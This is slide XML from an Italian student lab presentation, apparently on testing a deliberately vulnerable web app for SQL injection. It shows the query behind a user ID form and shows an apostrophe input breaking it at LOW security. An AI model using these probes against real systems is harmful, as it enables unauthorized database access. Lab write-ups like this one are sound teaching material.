          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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6" id="6"/>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TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1681541" y="82961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3.4 - VERIFICA DELLE VULNERABILITÀ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11416309" y="2124884"/>
            <a:ext cx="4013803" cy="2185413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2185413" w="4013803">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4013803" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013803" y="2185413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2185413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8770956" y="4555187"/>
            <a:ext cx="4219035" cy="2312915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2312915" w="4219035">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4219035" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219035" y="2312915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2312915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 10" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13631549" y="4535020"/>
            <a:ext cx="4115488" cy="2262932"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2262932" w="4115488">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4115488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4115488" y="2262932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2262932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13631549" y="7112993"/>
            <a:ext cx="4115488" cy="2145307"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2145307" w="4115488">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4115488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4115488" y="2145307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2145307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8770956" y="7112993"/>
            <a:ext cx="4219035" cy="2287296"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2287296" w="4219035">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4219035" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4219035" y="2287296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2287296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="-511" r="0" b="-511"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 13" id="13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="1320991" y="1207224"/>
            <a:ext cx="6117994" cy="8477885"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 14" id="1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5" id="1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6" id="1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9"/>
              <a:stretch>
                <a:fillRect l="-45764" t="0" r="-45764" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="1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8" id="1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9" id="1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20" id="2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21" id="2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2" id="2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3" id="2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4" id="2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5" id="25"/>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6" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="1951415">
            <a:off x="6685728" y="8555962"/>
            <a:ext cx="1605118" cy="1688653"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1688653" w="1605118">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1605118" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605118" y="1688654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16886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8770956" y="8185646"/>
            <a:ext cx="2328388" cy="1401266"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1401266" w="2328388">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2328388" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2328388" y="1401266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14012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8" id="2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WEEKII - TEAM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="2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30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="704592" y="2725166"/>
            <a:ext cx="7424806" cy="5844540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In seguito, verifichiamo il numero di ID presenti nel database inserendo diversi numeri: partendo da 0, si veda come gli unici ID  registrati che vengono riportati sono dal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>numero 1 al numero 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inserendo altre cifre, il form rimane cieco e non restituisce risultati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ID 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>corrisponde all’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Pablo Picasso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, la vittima di questo SQLi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>All’inserimento dei numeri nel campo User ID la query generata diventa:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = ‘ numero inserito ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="33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Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11416309" y="3429992"/>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2471973" y="1586851"/>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1416309" y="3199278"/>
            <a:ext cx="6018284" cy="2071333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2071333" w="6018284">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6018284" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6018284" y="2071333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2071333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="6900697"/>
            <a:ext cx="16405893" cy="249999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="249999" w="16405893">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16405893" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16405893" y="249999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="249999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-7469"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="895255"/>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3.4 - VERIFICA DELLE VULNERABILITÀ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="3158621" y="-803489"/>
            <a:ext cx="4884866" cy="9665546"/>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257" t="0" r="-22257"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7888643">
            <a:off x="11736093" y="5431171"/>
            <a:ext cx="1292006" cy="1162805"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1162805" w="1292006">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1292006" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292006" y="1162805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11628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1737262" y="4452088"/>
            <a:ext cx="1036117" cy="786585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="786585" w="1036117">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1036116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036116" y="786585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7865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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1567108" y="2202016"/>
            <a:ext cx="8258392" cy="4027757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2984"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2131">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel livello di sicurezza LOW, è possibile inserire un simbolo di escape (come un apostrofo, ' ) che provoca un errore nel codice SQL. La query generata diventa:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2984"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2131">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = “ ‘ “ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2984"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2859"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2042">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2042">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>server web rileva che un elemento di apertura (l'apostrofo) non è stato chiuso, causando un errore di sintassi SQL. Questo errore si manifesta con un messaggio simile a:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2984"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2984"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="6881647"/>
            <a:ext cx="14336025" cy="2910840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Questa implementazione è problematica perché se il server restituisce un errore simile, significa che non si aspettava tale input, rivelando una vulnerabilità. L'errore mostra che l'input dell'utente non è stato adeguatamente filtrato o validato, esponendo l'applicazione agli attacchi di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="33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0525637" y="5288185"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96487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4359874" y="-461069"/>
            <a:ext cx="9648774" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="9648774">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9648774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96487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7350715">
            <a:off x="15330618" y="1073605"/>
            <a:ext cx="7665473" cy="7339690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7339690" w="7665473">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7665473" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665473" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7339690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="7350715">
            <a:off x="-1010145" y="9251512"/>
            <a:ext cx="4960930" cy="4750091"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4750091" w="4960930">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4960931" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4960931" y="4750090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4750090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11301862" y="2064208"/>
            <a:ext cx="5850203" cy="7061178"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7061178" w="5850203">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5850203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5850203" y="7061177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7061177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1596600" y="415778"/>
            <a:ext cx="14743481" cy="612922"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4144"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5600" spc="-509">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3.5 - STUDIO DEL DATABASE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="234175" y="-237127"/>
            <a:ext cx="7469267" cy="10350384"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
